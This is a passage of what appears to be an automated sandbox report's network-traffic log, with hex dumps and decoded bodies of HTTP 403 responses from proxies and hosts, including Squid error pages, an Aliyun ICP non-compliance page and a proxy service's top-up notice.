6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:18 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:18 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:18 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:19 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:19 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:19 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 